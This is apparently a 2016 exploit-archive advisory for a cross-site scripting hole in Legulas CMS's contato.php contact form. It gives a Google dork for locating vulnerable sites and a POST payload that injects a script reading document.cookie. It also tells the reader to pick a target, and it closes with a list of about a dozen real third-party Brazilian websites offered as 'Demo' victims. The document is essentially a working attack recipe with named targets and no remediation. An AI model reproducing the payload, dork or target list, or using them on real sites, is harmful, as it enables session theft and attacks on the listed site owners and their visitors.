######################
# Exploit Title : Legulas CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.legulas.com.br/
# Google Dork : intext:"Desenvolvido por Légulas 2013"
# Date: 29 Apr 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
######################
# Vulnerable File : contato.php
# Request Method: POST
# Payload : assunto=1&email=n3t.hacker@gmail.com&mensagem=20&nome=ndnvhdaj'%22()%26%25<acx><ScRiPt%20>alert(document.cookie)</ScRiPt>&telefone=555-666-0606
# Describe : Search dork and select Target. Put /contato.php After url such as :
# http://site.com/contato.php
# Send data with post method ... Ok
#
# Demo :
# http://www.jeepclubedecuritiba.com.br/contato.php
# http://www.prbinstalacoes.com.br/contato.php
# http://www.dumesquita.com.br/contato.php
# http://www.attos.ind.br/contato.php
# http://www.aquarioemacrilico.com.br/contato.php
# http://casadaazeitona.com.br/contato.php
# http://www.almeidamateriais.com.br/contato.php
# http://www.domakoskicarnes.com.br/contato.php
# http://metalurgica3g.com.br/contato.php
# http://www.grespcred.com.br/contato.php
# http://www.unisat-br.com.br/contato.php
# http://www.streakwave.com.br/contato.php
#
#
######################
# discovered by : Net Hacker
######################